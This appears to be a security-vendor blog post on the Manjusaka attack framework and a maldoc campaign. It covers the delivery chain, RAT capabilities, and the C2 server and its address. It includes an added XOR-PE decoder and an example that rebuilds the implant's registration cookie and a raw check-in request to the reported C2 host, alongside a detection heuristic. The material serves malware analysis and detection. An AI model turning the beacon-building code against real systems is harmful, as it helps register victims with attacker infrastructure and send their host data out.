Cisco Talos recently reported on a campaign leveraging Manjusaka, a new attack framework being used in the wild that is advertised as an alternative to Cobalt Strike or Sliver.
- Manjusaka is an attack framework similar to Cobalt Strike or Sliver.
- Manjusaka implants are written in Rust, with variants for both Windows and Linux.
- Manjusaka’s C2 server is available on GitHub.
- In a recent campaign, threat actors used maldocs with COVID-19-related lures to deliver Manjusaka.
Manjusaka, which means “cow flower” in Chinese, is the name of a new attack framework being advertised as an alternative to Cobalt Strike or Sliver. Researchers at Cisco Talos assess that Manjusaka has the potential for widespread use across the threat landscape.
Manjusaka RAT implants are written in Rust and target Windows and Linux systems. The C2 is written in Go, with a Simplified Chinese user interface. The Manjusaka C2 executable is a fully functional C2 ELF binary; Cisco Talos also discovered an EXE version of the implant. While analyzing the C2, researchers were able to generate implants by specifying configurations in it.
Cisco Talos discovered a maldoc campaign that uses COVID-19-related documents as a lure to drop Cobalt Strike beacons on victim endpoints. They observed the same threat actor using both Cobalt Strike beacons and Manjusaka implants. The campaign, which targeted certain regions within China, had few targets and has been active since around June 2022.
The maldoc contains a VBA macro that executes rundll32.exe and injects Metasploit shellcode, which downloads and executes stage 2. Stage 2 is another shellcode blob containing an XOR-encoded Cobalt Strike executable together with the decoding shellcode; it decodes the executable and reflectively loads the Cobalt Strike beacon into process memory, where it runs.
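The stage 2 layout described above, an encoded PE sitting inside a shellcode blob next to the code that decodes it, is something an analyst usually has to pull apart by hand. The following is an added example (not code from the Talos report or the PolySwarm post) showing how to recover such a payload when a single-byte XOR key is used; the key size, the stand-in PE, and the junk prefix are assumptions constructed for illustration, since the report does not state how the beacon was encoded. The search keys on three structural facts about a PE file rather than on the "MZ" bytes alone, which cuts false positives when scanning large blobs.

```python
"""Locate and decode a single-byte-XOR-encoded PE embedded in a shellcode blob.

Added illustrative example; key width and sample bytes are assumptions,
not details taken from the Manjusaka/Cobalt Strike analysis.
"""

DOS_STUB_TEXT = b"This program cannot be run in DOS mode."


def build_fake_pe() -> bytes:
    """Constructed stand-in for a PE image: MZ header, e_lfanew at 0x3C,
    the DOS stub string, and a PE signature at the offset e_lfanew names."""
    pe_off = 0x80
    img = bytearray(b"MZ" + b"\x00" * 0x3A)          # pad to offset 0x3C
    img += pe_off.to_bytes(4, "little")               # e_lfanew
    img += b"\x00" * (0x4E - len(img))
    img += DOS_STUB_TEXT
    img += b"\x00" * (pe_off - len(img))
    img += b"PE\x00\x00"                              # IMAGE_NT_SIGNATURE
    img += b"\x00" * 64                               # stand-in for headers
    return bytes(img)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


# Constructed sample blob: decoder-like junk bytes followed by the XOR-encoded PE.
JUNK_PREFIX = bytes([0x90, 0xCC, 0xE8, 0x00]) * 8
SAMPLE_KEY = 0x5A
SAMPLE_BLOB = JUNK_PREFIX + xor_bytes(build_fake_pe(), SAMPLE_KEY)


def find_xor_pe(blob: bytes, max_e_lfanew: int = 0x400):
    """Try every single-byte key and return (key, offset, decoded_tail) for the
    first candidate that looks like a real PE, or None if nothing matches.

    A candidate must satisfy all three checks:
      1. 'MZ' at the candidate offset,
      2. the e_lfanew field points to a 'PE\\0\\0' signature within the blob,
      3. the DOS stub text appears between the MZ header and that signature.
    """
    for key in range(256):
        dec = xor_bytes(blob, key)
        idx = dec.find(b"MZ")
        while idx != -1:
            if idx + 0x40 <= len(dec):
                e_lfanew = int.from_bytes(dec[idx + 0x3C:idx + 0x40], "little")
                sig_at = idx + e_lfanew
                if (0x40 <= e_lfanew <= max_e_lfanew
                        and dec[sig_at:sig_at + 4] == b"PE\x00\x00"
                        and DOS_STUB_TEXT in dec[idx:sig_at]):
                    return key, idx, dec[idx:]
            idx = dec.find(b"MZ", idx + 1)
    return None


if __name__ == "__main__":
    hit = find_xor_pe(SAMPLE_BLOB)
    if hit is None:
        print("no encoded PE found")
    else:
        key, off, image = hit
        print(f"key=0x{key:02X} offset=0x{off:X} image_len={len(image)}")
```

On a real stage 2 dump the same routine is run over the whole blob; a multi-byte key would need the candidate-key loop widened, but the three structural checks stay the same.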
The sample Cisco Talos analyzed made HTTP requests to http://39.104.90[.]45/global/favicon.png, sending a fixed session cookie defined by the sample. The cookie is base64-encoded and contains a compressed copy of binary data, including random bytes and system information, which is used to register the infected machine with the C2.
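The registration exchange above is worth seeing from both sides: how a beacon packs host data into a cookie, and what a defender can do with a cookie that decodes to a compressed blob. The following is an added example, not code from the Talos report or from the Manjusaka project. The report says only that the cookie is base64 and carries compressed data with random bytes and system information; the zlib compression, the 16-byte nonce, the JSON field layout, and the `session` cookie name used here are assumptions chosen for illustration.

```python
"""Build, parse, and flag a base64(compressed(nonce || host info)) beacon cookie.

Added illustrative example. Compression algorithm (zlib), nonce length,
field layout and cookie name are assumptions, not details from the report.
"""
import base64
import json
import zlib

C2_HOST = "39.104.90.45"            # as reported by Talos (defanged in the text)
C2_PATH = "/global/favicon.png"

# Constructed sample host data and nonce, standing in for what an implant
# would collect at registration time.
SAMPLE_INFO = {"hostname": "WIN-TEST01", "os": "Windows 10 Pro 19044", "user": "alice"}
SAMPLE_NONCE = bytes(range(16))


def build_registration_cookie(system_info: dict, nonce: bytes) -> str:
    """Implant side: nonce || JSON(host info), zlib-compressed, base64-encoded."""
    if len(nonce) != 16:
        raise ValueError("nonce must be 16 bytes")
    payload = nonce + json.dumps(system_info, sort_keys=True).encode()
    return base64.b64encode(zlib.compress(payload)).decode()


def build_request(cookie: str) -> str:
    """The raw HTTP/1.1 request the implant would send for the check-in."""
    return (
        f"GET {C2_PATH} HTTP/1.1\r\n"
        f"Host: {C2_HOST}\r\n"
        f"Cookie: session={cookie}\r\n"
        "\r\n"
    )


def parse_registration_cookie(cookie: str):
    """C2/analyst side: reverse the encoding and split nonce from host info."""
    raw = base64.b64decode(cookie, validate=True)
    data = zlib.decompress(raw)
    return data[:16], json.loads(data[16:])


def is_suspicious_cookie(value: str) -> bool:
    """Detection heuristic for proxy or IDS logs: a cookie value that
    base64-decodes to a well-formed zlib stream is not something a normal
    favicon request carries. Returns False on any decode failure."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:               # binascii.Error is a ValueError subclass
        return False
    if len(raw) < 2 or raw[0] != 0x78:   # zlib CMF byte: deflate, 32K window
        return False
    try:
        zlib.decompress(raw)
    except zlib.error:
        return False
    return True


def cookie_from_request(request: str) -> str:
    """Pull the session cookie value out of a raw request (helper for log triage)."""
    for line in request.split("\r\n"):
        if line.lower().startswith("cookie:"):
            for part in line.split(":", 1)[1].split(";"):
                name, _, val = part.strip().partition("=")
                if name == "session":
                    return val
    return ""


if __name__ == "__main__":
    cookie = build_registration_cookie(SAMPLE_INFO, SAMPLE_NONCE)
    req = build_request(cookie)
    print(req)
    print("suspicious:", is_suspicious_cookie(cookie_from_request(req)))
    print("decoded:", parse_registration_cookie(cookie))
```

The heuristic is deliberately narrow: it only fires on cookies that actually inflate, so ordinary opaque session tokens and JWTs pass through, while a beacon that registers by stuffing compressed host data into a cookie stands out even when the URL is as innocuous as a favicon fetch.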
Manjusaka RAT allows threat actors to execute arbitrary commands, get file information including creation time and file index, obtain network configuration information, collect browser credentials for Chromium-based browsers, collect WiFi SSID information, obtain Navicat credentials, take screenshots, obtain detailed system information, and activate the file management module.
System information collected by the Windows variant includes global system memory information, processor power, WMI temperature readings, network interface names, process and system times, process module names, disk drive information, network account names, and Windows build and version numbers. File management capabilities include file enumeration, creating directories, setting the current working directory, obtaining full file paths, deleting files and removing directories, moving files, and reading and writing file data.
The Linux ELF variant operates similarly to the Windows version but collects the following system-specific information: global system information, system memory information, system uptime and idle time, OS identification, kernel activity information, CPU information, temperature information, network interface information, device mount and file system information, and user account information. The file management module is equivalent to the Windows version.
Cisco Talos discovered a copy of the Manjusaka C2 server binary on GitHub and noted it can be used to monitor and administer a victim machine and generate the Rust implants as payloads. The C2 server and admin panel use the Gin Web Framework to issue commands to the implants and stagers. Cisco Talos noted the threat actor using Manjusaka in this campaign does not appear to be associated with the developer of Manjusaka.
PolySwarm has multiple samples associated with the Manjusaka framework.
You can use the following CLI command to search for all Manjusaka samples in our portal:
$ polyswarm link list -f Manjusaka
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.